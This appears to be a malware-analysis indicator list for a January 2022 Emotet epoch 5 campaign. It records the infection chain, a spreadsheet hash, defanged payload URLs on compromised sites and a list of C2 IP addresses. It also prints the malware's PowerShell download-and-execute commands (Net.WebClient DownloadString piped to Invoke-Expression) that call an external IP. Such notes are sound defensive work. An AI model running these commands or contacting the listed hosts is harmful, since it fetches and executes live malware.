e5_emotet_26.01.2022.txt

Emotet 2022

************************************************************************************************************

Epoch5 - zip > xls > ps > dll - 26/01/2022

.xls 1fbc034b30e25ab7747780e6df958cd8bbd6ffbae6e78170f52a981d5da40c29

$c1 = "(New-Object Net.We"
$c4 = "bClient).Downlo"
$c3 = "adString('hxxp://91.240.118.168/qw/as/se.png')"
$ji = "(New-Object Net.WebClient).DownloadString('hxxp://91.240.118.168/qw/as/se.png')"
invoke-expression "(New-Object Net.WebClient).DownloadString('hxxp://91.240.118.168/qw/as/se.png')"|invoke-expression
# powershell snippet 1
(new-object net.webclient).downloadstring("hxxp://91.240.118.168/qw/as/se.png")

hxxp://sesco-ks.com/wp-content/0Uuf/
hxxps://montenegroinvesting.com/wp-admin/d5KRp8e1bUR20vICZ3p/
hxxp://sexescortsdubai.com/maintenance/jx4Ba/
hxxp://actividades.laforetlanguages.com/wp-admin/IU833uv/
hxxps://wlmconcept.com/cgi-bin/9tl5Twe4suaxBKaKB/
hxxp://b-lubisi-motivational-speaker.com/wp-admin/rviEsA/
hxxp://barriemckay.com/wp-admin/yuF2aHG/
hxxps://pmfstukm.com/wp-admin/02Bmdv/
hxxps://midweststructure.com/wp-includes/pg8AaWRbnH3MffrNRMv/
hxxps://nomanatif.net/wp-includes/u1kbP/
hxxp://osiris-cheats.net/wp-admin/pCwOGd7/
hxxps://huyndai-namdinh.com/wp-content/QQiYwNcaegg/

c2's

185.244.166.137:443
185.168.130.138:443
59.148.253.194:443
78.46.73.125:443
195.77.239.39:8080
104.131.62.48:8080
69.16.218.101:8080
203.153.216.46:443
195.154.146.35:443
190.90.233.66:443
191.252.103.16:80
37.44.244.177:8080
168.197.250.14:80
116.124.128.206:8080
54.37.228.122:443
159.69.237.188:443
85.214.67.203:8080
210.57.209.142:8080
78.47.204.80:443
185.148.168.220:8080
142.4.219.173:8080
85.25.120.45:8080
128.199.192.135:8080
66.42.57.149:443
62.171.178.147:8080
54.38.242.185:443
217.182.143.207:443
185.148.168.15:8080
37.59.209.141:8080
207.148.81.119:8080